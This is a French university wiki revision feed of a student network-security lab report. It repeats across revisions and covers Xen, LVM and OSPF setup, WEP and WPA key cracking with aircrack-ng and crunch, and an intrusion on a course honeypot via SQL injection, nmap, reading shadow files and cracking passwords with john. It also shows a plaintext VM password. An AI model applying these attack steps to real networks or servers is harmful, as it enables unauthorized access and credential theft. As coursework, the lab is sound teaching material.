 mkfs.ext4 /dev/storage/stropharia-home&lt;br /&gt;
 mkfs.ext4 /dev/storage/stropharia-var&lt;br /&gt;
&lt;br /&gt;
On note ces modifications dans /etc/xen/stropharia.cfg&lt;br /&gt;
&lt;br /&gt;
 disk       = [&lt;br /&gt;
              'file:/usr/local/xen/domains/trompettedelamort/disk.img,xvda2,w',&lt;br /&gt;
              'file:/usr/local/xen/domains/trompettedelamort/swap.img,xvda1,w',&lt;br /&gt;
              'phy:/dev/storage/trompettedelamort1,xvda3,w',&lt;br /&gt;
              'phy:/dev/storage/trompettedelamort2,xvda4,w'&lt;br /&gt;
            ]&lt;br /&gt;
&lt;br /&gt;
On lance maintenant la VM et l'on s'y connecte :&lt;br /&gt;
 xl create -c /etc/xen/stropharia.cfg&lt;br /&gt;
 xl console stropharia&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Après avoir monté et peuplé les partitions, on ajoute dans /etc/fstab&lt;br /&gt;
 /dev/xvda3 /home /ext4 default 0 2&lt;br /&gt;
 /dev/xvda4 /var /ext4 default 0 2&lt;br /&gt;
pour que le montage des partitions soit fait automatiquement à chaque démarrage.&lt;br /&gt;
&lt;br /&gt;
=5.1=&lt;br /&gt;
=5.2  Cassage de clef WEP d’un point d’accès WiFi=&lt;br /&gt;
&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On lance un scran des réseaux wifi'''&lt;br /&gt;
 airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
'''On capture les paquets'''&lt;br /&gt;
 airdump-ng --write crack11 --channel 3 --bssid 04:DA:D2:9C:50:5A wlan0mon&lt;br /&gt;
'''On lance le crack de la clé'''&lt;br /&gt;
 aircrack-ng -z crack11-01.cap&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [F1:DE:D4:00:00:00:00:0F:FF:FF:FF:FF:FF ]&lt;br /&gt;
=5.3=&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On regarde les réseaux pour avoir le BSSID'''&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
'''On lance la commande capture sur le channel 5 et on attend le handshake'''&lt;br /&gt;
 airodump-ng --write donnees -c 5 --bssid 00:14:1B:60:8C:2A&lt;br /&gt;
'''Pendant ce temps-là, nous créons le dictionnaire pour le brutforce'''&lt;br /&gt;
 crunch 8 8 0123456789 &amp;gt; dictionnaire.txt&lt;br /&gt;
'''Pour gagner du temps, nous divisions ce dictionnaire en 4 parties'''&lt;br /&gt;
 split -l 25000000 dictionnaire.txt dictionnairediv.txt&lt;br /&gt;
&lt;br /&gt;
'''On lance le brutforce sur plusieurs machine en fonction'''&lt;br /&gt;
 aircrack-ng -a2 -b 00:14:1B:60:8C:2A -w dictionnairediv#.txt donnees-01.cap&lt;br /&gt;
&lt;br /&gt;
=5.4=&lt;br /&gt;
=5.5  Intrusion sur un serveur d’application Web=&lt;br /&gt;
&lt;br /&gt;
Sur site honey.plil.info, on exploite la faille avec une injection SQL dans l'id et le mdp:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
&lt;br /&gt;
On constate qu'il y a un service SSH et un serveur apache avec la commande suivante:&lt;br /&gt;
 nmap -T4 -A honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Avec l'utilisation des manuels on extrait le fichier de configuration phpmyadmin afin d'avoir les identifiants pour se connecter honey.plil.fr/phpmyadmin. Il est important de se connecter en root avec le même mdp.&lt;br /&gt;
&lt;br /&gt;
Dans la BDD, on retrouve un compte d'un utilisateur ayant les droits sur la machine. On se connecte donc en SSH avec son compte et on extrait les fichier password et shadow.&lt;br /&gt;
&lt;br /&gt;
Nous allons donc utiliser john pour trouver le mdp root. De plus, nous créons notre dictionnaire avec crunch et sed en utilisant l'indice du sujet.&lt;br /&gt;
&lt;br /&gt;
Je lance donc la commande suivante:&lt;br /&gt;
 john --wordlist=dictionnaire password.txt unshadow.txt &amp;gt; output.txt&lt;br /&gt;
&lt;br /&gt;
Mdp trouvé et connexion en root(Groupe11):&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Honeygroupe11.png]]&lt;br /&gt;
&lt;br /&gt;
=Configuration OSPF sur 9200=&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                                  &lt;br /&gt;
 router-id 10.60.0.2                                  &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                                    &lt;br /&gt;
 summary-address 100.60.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                                  &lt;br /&gt;
 redistribute connected subnets                        &lt;br /&gt;
 redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
=Configuration du dns sur Gandi=&lt;/div&gt;</summary>
		<author><name>Ccalleri</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=54199</id>
		<title>TP sysres IMA5sc 2020/2021 G11</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=54199"/>
				<updated>2020-11-30T17:22:14Z</updated>
		
		<summary type="html">&lt;p&gt;Ccalleri : /* Création de la VM */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Sébastien DARDENNE - Corto CALLERISA&lt;br /&gt;
&lt;br /&gt;
=Adressage=&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! IP (privée) !! IP (publique) !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 Routeur !! IPV6&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 100.64.0.18&lt;br /&gt;
| 193.48.57.178&lt;br /&gt;
| 311&lt;br /&gt;
| 10.60.111.0/24&lt;br /&gt;
| 10.60.111.1&lt;br /&gt;
| 10.60.111.2&lt;br /&gt;
| 10.60.111.254&lt;br /&gt;
| 2001:660:4401:60bd::0/64&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Mise en place de la machine virtuelle Xen=&lt;br /&gt;
==Creation de la VM==&lt;br /&gt;
&lt;br /&gt;
Après nous être connecté sur le serveur capbreton.plil.fr, nous créons la machine virtuelle du TP avec la commande :&lt;br /&gt;
 root@capbreton:~# xen-create-image --hostname=stropharia --password=pasglop --ip=100.64.0.18 --gateway=100.64.0.5 --netmask=255.255.255.0 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Cette commande spécifie les information de connexion à la VM ainsi que des informations réseau et la dernière version de Debian : Buster&lt;br /&gt;
&lt;br /&gt;
==Configuration LVM==&lt;br /&gt;
&lt;br /&gt;
Les disques de capbreton ont été initialisé pour l'utilisation avec LVM :&lt;br /&gt;
&lt;br /&gt;
 pvcreate /dev/sde&lt;br /&gt;
 pvcreate /dev/sdf&lt;br /&gt;
&lt;br /&gt;
Ces disques sont ensuite rassemblés dans le volume groupe storage :&lt;br /&gt;
 vgcreate storage /dev/sde /dev/sdf&lt;br /&gt;
&lt;br /&gt;
On obtient bien un groupe de 5.46 Tb :&lt;br /&gt;
 root@capbreton:~# vgdisplay storage&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  59&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                38&lt;br /&gt;
  Open LV               37&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       69632 / 272.00 GiB&lt;br /&gt;
  Free  PE / Size       1360894 / 5.19 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
On crée alors deux volumes logiques de 10 Go qui nous servirons de /var et /home :&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n stropharia-home storage&lt;br /&gt;
 lvcreate -L10G -n stropharia-var storage&lt;br /&gt;
&lt;br /&gt;
Voici le résultat :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# lvdisplay | grep &amp;quot;stropharia&amp;quot; -A 15&lt;br /&gt;
  LV Path                /dev/storage/stropharia-home&lt;br /&gt;
  LV Name                stropharia-home&lt;br /&gt;
  VG Name                storage&lt;br /&gt;
  LV UUID                ofMU3m-QoN1-pZcA-32Dp-HJBN-ZNAn-O3awlc&lt;br /&gt;
  LV Write Access        read/write&lt;br /&gt;
  LV Creation host, time capbreton, 2020-10-12 17:40:11 +0200&lt;br /&gt;
  LV Status              available&lt;br /&gt;
  # open                 1&lt;br /&gt;
  LV Size                10.00 GiB&lt;br /&gt;
  Current LE             2560&lt;br /&gt;
  Segments               1&lt;br /&gt;
  Allocation             inherit&lt;br /&gt;
  Read ahead sectors     auto&lt;br /&gt;
  - currently set to     256&lt;br /&gt;
  Block device           254:18&lt;br /&gt;
   &lt;br /&gt;
  --- Logical volume ---&lt;br /&gt;
  LV Path                /dev/storage/stropharia-var&lt;br /&gt;
  LV Name                stropharia-var&lt;br /&gt;
  VG Name                storage&lt;br /&gt;
  LV UUID                8YAGLs-wD0c-6pSF-VEmC-wUfT-e9SI-8X9nFn&lt;br /&gt;
  LV Write Access        read/write&lt;br /&gt;
  LV Creation host, time capbreton, 2020-10-12 17:40:15 +0200&lt;br /&gt;
  LV Status              available&lt;br /&gt;
  # open                 1&lt;br /&gt;
  LV Size                10.00 GiB&lt;br /&gt;
  Current LE             2560&lt;br /&gt;
  Segments               1&lt;br /&gt;
  Allocation             inherit&lt;br /&gt;
  Read ahead sectors     auto&lt;br /&gt;
  - currently set to     256&lt;br /&gt;
  Block device           254:19&lt;br /&gt;
&lt;br /&gt;
On formate nos partitions au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/stropharia-home&lt;br /&gt;
 mkfs.ext4 /dev/storage/stropharia-var&lt;br /&gt;
&lt;br /&gt;
On note ces modifications dans /etc/xen/stropharia.cfg&lt;br /&gt;
&lt;br /&gt;
 disk       = [&lt;br /&gt;
              'file:/usr/local/xen/domains/trompettedelamort/disk.img,xvda2,w',&lt;br /&gt;
              'file:/usr/local/xen/domains/trompettedelamort/swap.img,xvda1,w',&lt;br /&gt;
              'phy:/dev/storage/trompettedelamort1,xvda3,w',&lt;br /&gt;
              'phy:/dev/storage/trompettedelamort2,xvda4,w'&lt;br /&gt;
            ]&lt;br /&gt;
&lt;br /&gt;
On lance maintenant la VM et l'on s'y connecte :&lt;br /&gt;
 xl create -c /etc/xen/stropharia.cfg&lt;br /&gt;
 xl console stropharia&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Après avoir monté et peuplé les partitions, on ajoute dans /etc/fstab&lt;br /&gt;
 /dev/xvda3 /home /ext4 default 0 2&lt;br /&gt;
 /dev/xvda4 /var /ext4 default 0 2&lt;br /&gt;
pour que le montage des partitions soit fait automatiquement à chaque démarrage.&lt;br /&gt;
&lt;br /&gt;
=5.1=&lt;br /&gt;
=5.2  Cassage de clef WEP d’un point d’accès WiFi=&lt;br /&gt;
&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On lance un scran des réseaux wifi'''&lt;br /&gt;
 airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
'''On capture les paquets'''&lt;br /&gt;
 airdump-ng --write crack11 --channel 3 --bssid 04:DA:D2:9C:50:5A wlan0mon&lt;br /&gt;
'''On lance le crack de la clé'''&lt;br /&gt;
 aircrack-ng -z crack11-01.cap&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [F1:DE:D4:00:00:00:00:0F:FF:FF:FF:FF:FF ]&lt;br /&gt;
=5.3=&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On regarde les réseaux pour avoir le BSSID'''&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
'''On lance la commande capture sur le channel 5 et on attend le handshake'''&lt;br /&gt;
 airodump-ng --write donnees -c 5 --bssid 00:14:1B:60:8C:2A&lt;br /&gt;
'''Pendant ce temps-là, nous créons le dictionnaire pour le brutforce'''&lt;br /&gt;
 crunch 8 8 0123456789 &amp;gt; dictionnaire.txt&lt;br /&gt;
'''Pour gagner du temps, nous divisions ce dictionnaire en 4 parties'''&lt;br /&gt;
 split -l 25000000 dictionnaire.txt dictionnairediv.txt&lt;br /&gt;
&lt;br /&gt;
'''On lance le brutforce sur plusieurs machine en fonction'''&lt;br /&gt;
 aircrack-ng -a2 -b 00:14:1B:60:8C:2A -w dictionnairediv#.txt donnees-01.cap&lt;br /&gt;
&lt;br /&gt;
=5.4=&lt;br /&gt;
=5.5  Intrusion sur un serveur d’application Web=&lt;br /&gt;
&lt;br /&gt;
Sur site honey.plil.info, on exploite la faille avec une injection SQL dans l'id et le mdp:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
&lt;br /&gt;
On constate qu'il y a un service SSH et un serveur apache avec la commande suivante:&lt;br /&gt;
 nmap -T4 -A honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Avec l'utilisation des manuels on extrait le fichier de configuration phpmyadmin afin d'avoir les identifiants pour se connecter honey.plil.fr/phpmyadmin. Il est important de se connecter en root avec le même mdp.&lt;br /&gt;
&lt;br /&gt;
Dans la BDD, on retrouve un compte d'un utilisateur ayant les droits sur la machine. On se connecte donc en SSH avec son compte et on extrait les fichier password et shadow.&lt;br /&gt;
&lt;br /&gt;
Nous allons donc utiliser john pour trouver le mdp root. De plus, nous créons notre dictionnaire avec crunch et sed en utilisant l'indice du sujet.&lt;br /&gt;
&lt;br /&gt;
Je lance donc la commande suivante:&lt;br /&gt;
 john --wordlist=dictionnaire password.txt unshadow.txt &amp;gt; output.txt&lt;br /&gt;
&lt;br /&gt;
Mdp trouvé et connexion en root(Groupe11):&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Honeygroupe11.png]]&lt;br /&gt;
&lt;br /&gt;
=Configuration OSPF sur 9200=&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                                  &lt;br /&gt;
 router-id 10.60.0.2                                  &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                                    &lt;br /&gt;
 summary-address 100.60.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                                  &lt;br /&gt;
 redistribute connected subnets                        &lt;br /&gt;
 redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
=Configuration du dns sur Gandi=&lt;/div&gt;</summary>
		<author><name>Ccalleri</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=54197</id>
		<title>TP sysres IMA5sc 2020/2021 G11</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=54197"/>
				<updated>2020-11-30T17:18:13Z</updated>
		
		<summary type="html">&lt;p&gt;Ccalleri : /* Configuration LVM */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Sébastien DARDENNE - Corto CALLERISA&lt;br /&gt;
&lt;br /&gt;
=Adressage=&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! IP (privée) !! IP (publique) !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 Routeur !! IPV6&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 100.64.0.18&lt;br /&gt;
| 193.48.57.178&lt;br /&gt;
| 311&lt;br /&gt;
| 10.60.111.0/24&lt;br /&gt;
| 10.60.111.1&lt;br /&gt;
| 10.60.111.2&lt;br /&gt;
| 10.60.111.254&lt;br /&gt;
| 2001:660:4401:60bd::0/64&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Mise en place de la machine virtuelle Xen=&lt;br /&gt;
==Creation de la VM==&lt;br /&gt;
&lt;br /&gt;
Après nous être connecté sur le serveur capbreton.plil.fr, nous créons la machine virtuelle du TP avec la commande :&lt;br /&gt;
 root@capbreton:~# xen-create-image --hostname=stropharia --password=pasglop --ip=100.64.0.18 --gateway=100.64.0.5 --netmask=255.255.255.0 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Cette commande spécifie les information de connexion à la VM ainsi que des informations réseau et la dernière version de Debian : Buster&lt;br /&gt;
&lt;br /&gt;
==Configuration LVM==&lt;br /&gt;
&lt;br /&gt;
Les disques de capbreton ont été initialisé pour l'utilisation avec LVM :&lt;br /&gt;
&lt;br /&gt;
 pvcreate /dev/sde&lt;br /&gt;
 pvcreate /dev/sdf&lt;br /&gt;
&lt;br /&gt;
Ces disques sont ensuite rassemblés dans le volume groupe storage :&lt;br /&gt;
 vgcreate storage /dev/sde /dev/sdf&lt;br /&gt;
&lt;br /&gt;
On obtient bien un groupe de 5.46 Tb :&lt;br /&gt;
 root@capbreton:~# vgdisplay storage&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  59&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                38&lt;br /&gt;
  Open LV               37&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       69632 / 272.00 GiB&lt;br /&gt;
  Free  PE / Size       1360894 / 5.19 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
On crée alors deux volumes logiques de 10 Go qui nous servirons de /var et /home :&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n stropharia-home storage&lt;br /&gt;
 lvcreate -L10G -n stropharia-var storage&lt;br /&gt;
&lt;br /&gt;
Voici le résultat :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# lvdisplay | grep &amp;quot;stropharia&amp;quot; -A 15&lt;br /&gt;
  LV Path                /dev/storage/stropharia-home&lt;br /&gt;
  LV Name                stropharia-home&lt;br /&gt;
  VG Name                storage&lt;br /&gt;
  LV UUID                ofMU3m-QoN1-pZcA-32Dp-HJBN-ZNAn-O3awlc&lt;br /&gt;
  LV Write Access        read/write&lt;br /&gt;
  LV Creation host, time capbreton, 2020-10-12 17:40:11 +0200&lt;br /&gt;
  LV Status              available&lt;br /&gt;
  # open                 1&lt;br /&gt;
  LV Size                10.00 GiB&lt;br /&gt;
  Current LE             2560&lt;br /&gt;
  Segments               1&lt;br /&gt;
  Allocation             inherit&lt;br /&gt;
  Read ahead sectors     auto&lt;br /&gt;
  - currently set to     256&lt;br /&gt;
  Block device           254:18&lt;br /&gt;
   &lt;br /&gt;
  --- Logical volume ---&lt;br /&gt;
  LV Path                /dev/storage/stropharia-var&lt;br /&gt;
  LV Name                stropharia-var&lt;br /&gt;
  VG Name                storage&lt;br /&gt;
  LV UUID                8YAGLs-wD0c-6pSF-VEmC-wUfT-e9SI-8X9nFn&lt;br /&gt;
  LV Write Access        read/write&lt;br /&gt;
  LV Creation host, time capbreton, 2020-10-12 17:40:15 +0200&lt;br /&gt;
  LV Status              available&lt;br /&gt;
  # open                 1&lt;br /&gt;
  LV Size                10.00 GiB&lt;br /&gt;
  Current LE             2560&lt;br /&gt;
  Segments               1&lt;br /&gt;
  Allocation             inherit&lt;br /&gt;
  Read ahead sectors     auto&lt;br /&gt;
  - currently set to     256&lt;br /&gt;
  Block device           254:19&lt;br /&gt;
&lt;br /&gt;
On formate nos partitions au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/stropharia-home&lt;br /&gt;
 mkfs.ext4 /dev/storage/stropharia-var&lt;br /&gt;
&lt;br /&gt;
On note ces modifications dans /etc/xen/stropharia.cfg&lt;br /&gt;
&lt;br /&gt;
 disk       = [&lt;br /&gt;
              'file:/usr/local/xen/domains/trompettedelamort/disk.img,xvda2,w',&lt;br /&gt;
              'file:/usr/local/xen/domains/trompettedelamort/swap.img,xvda1,w',&lt;br /&gt;
              'phy:/dev/storage/trompettedelamort1,xvda3,w',&lt;br /&gt;
              'phy:/dev/storage/trompettedelamort2,xvda4,w'&lt;br /&gt;
            ]&lt;br /&gt;
&lt;br /&gt;
On lance maintenant la VM et l'on s'y connecte :&lt;br /&gt;
 xl create -c /etc/xen/stropharia.cfg&lt;br /&gt;
 xl console stropharia&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Après avoir monté et peuplé les partitions, on ajoute dans /etc/fstab&lt;br /&gt;
 /dev/xvda3 /home /ext4 default 0 2&lt;br /&gt;
 /dev/xvda4 /var /ext4 default 0 2&lt;br /&gt;
pour que le montage des partitions soit fait automatiquement à chaque démarrage.&lt;br /&gt;
&lt;br /&gt;
=5.1=&lt;br /&gt;
=5.2  Cassage de clef WEP d’un point d’accès WiFi=&lt;br /&gt;
&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On lance un scran des réseaux wifi'''&lt;br /&gt;
 airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
'''On capture les paquets'''&lt;br /&gt;
 airdump-ng --write crack11 --channel 3 --bssid 04:DA:D2:9C:50:5A wlan0mon&lt;br /&gt;
'''On lance le crack de la clé'''&lt;br /&gt;
 aircrack-ng -z crack11-01.cap&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [F1:DE:D4:00:00:00:00:0F:FF:FF:FF:FF:FF ]&lt;br /&gt;
=5.3=&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On regarde les réseaux pour avoir le BSSID'''&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
'''On lance la commande capture sur le channel 5 et on attend le handshake'''&lt;br /&gt;
 airodump-ng --write donnees -c 5 --bssid 00:14:1B:60:8C:2A&lt;br /&gt;
'''Pendant ce temps-là, nous créons le dictionnaire pour le brutforce'''&lt;br /&gt;
 crunch 8 8 0123456789 &amp;gt; dictionnaire.txt&lt;br /&gt;
'''Pour gagner du temps, nous divisions ce dictionnaire en 4 parties'''&lt;br /&gt;
 split -l 25000000 dictionnaire.txt dictionnairediv.txt&lt;br /&gt;
&lt;br /&gt;
'''On lance le brutforce sur plusieurs machine en fonction'''&lt;br /&gt;
 aircrack-ng -a2 -b 00:14:1B:60:8C:2A -w dictionnairediv#.txt donnees-01.cap&lt;br /&gt;
&lt;br /&gt;
=5.4=&lt;br /&gt;
=5.5  Intrusion sur un serveur d’application Web=&lt;br /&gt;
&lt;br /&gt;
Sur site honey.plil.info, on exploite la faille avec une injection SQL dans l'id et le mdp:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
&lt;br /&gt;
On constate qu'il y a un service SSH et un serveur apache avec la commande suivante:&lt;br /&gt;
 nmap -T4 -A honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Avec l'utilisation des manuels on extrait le fichier de configuration phpmyadmin afin d'avoir les identifiants pour se connecter honey.plil.fr/phpmyadmin. Il est important de se connecter en root avec le même mdp.&lt;br /&gt;
&lt;br /&gt;
Dans la BDD, on retrouve un compte d'un utilisateur ayant les droits sur la machine. On se connecte donc en SSH avec son compte et on extrait les fichier password et shadow.&lt;br /&gt;
&lt;br /&gt;
Nous allons donc utiliser john pour trouver le mdp root. De plus, nous créons notre dictionnaire avec crunch et sed en utilisant l'indice du sujet.&lt;br /&gt;
&lt;br /&gt;
Je lance donc la commande suivante:&lt;br /&gt;
 john --wordlist=dictionnaire password.txt unshadow.txt &amp;gt; output.txt&lt;br /&gt;
&lt;br /&gt;
Mdp trouvé et connexion en root(Groupe11):&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Honeygroupe11.png]]&lt;br /&gt;
&lt;br /&gt;
=Configuration OSPF sur 9200=&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                                  &lt;br /&gt;
 router-id 10.60.0.2                                  &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                                    &lt;br /&gt;
 summary-address 100.60.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                                  &lt;br /&gt;
 redistribute connected subnets                        &lt;br /&gt;
 redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
=Création de la VM=&lt;br /&gt;
&lt;br /&gt;
SSH sur capbreton&lt;br /&gt;
 xen-create-image&lt;br /&gt;
&lt;br /&gt;
=Configuration du dns sur Gandi=&lt;/div&gt;</summary>
		<author><name>Ccalleri</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=54194</id>
		<title>TP sysres IMA5sc 2020/2021 G11</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=54194"/>
				<updated>2020-11-30T17:15:13Z</updated>
		
		<summary type="html">&lt;p&gt;Ccalleri : /* Configuration LVM */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Sébastien DARDENNE - Corto CALLERISA&lt;br /&gt;
&lt;br /&gt;
=Adressage=&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! IP (privée) !! IP (publique) !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 Routeur !! IPV6&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 100.64.0.18&lt;br /&gt;
| 193.48.57.178&lt;br /&gt;
| 311&lt;br /&gt;
| 10.60.111.0/24&lt;br /&gt;
| 10.60.111.1&lt;br /&gt;
| 10.60.111.2&lt;br /&gt;
| 10.60.111.254&lt;br /&gt;
| 2001:660:4401:60bd::0/64&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Mise en place de la machine virtuelle Xen=&lt;br /&gt;
==Creation de la VM==&lt;br /&gt;
&lt;br /&gt;
Après nous être connecté sur le serveur capbreton.plil.fr, nous créons la machine virtuelle du TP avec la commande :&lt;br /&gt;
 root@capbreton:~# xen-create-image --hostname=stropharia --password=pasglop --ip=100.64.0.18 --gateway=100.64.0.5 --netmask=255.255.255.0 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Cette commande spécifie les information de connexion à la VM ainsi que des informations réseau et la dernière version de Debian : Buster&lt;br /&gt;
&lt;br /&gt;
==Configuration LVM==&lt;br /&gt;
&lt;br /&gt;
Les disques de capbreton ont été initialisé pour l'utilisation avec LVM :&lt;br /&gt;
&lt;br /&gt;
 pvcreate /dev/sde&lt;br /&gt;
 pvcreate /dev/sdf&lt;br /&gt;
&lt;br /&gt;
Ces disques sont ensuite rassemblés dans le volume groupe storage :&lt;br /&gt;
 vgcreate storage /dev/sde /dev/sdf&lt;br /&gt;
&lt;br /&gt;
On obtient bien un groupe de 5.46 Tb :&lt;br /&gt;
 root@capbreton:~# vgdisplay storage&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
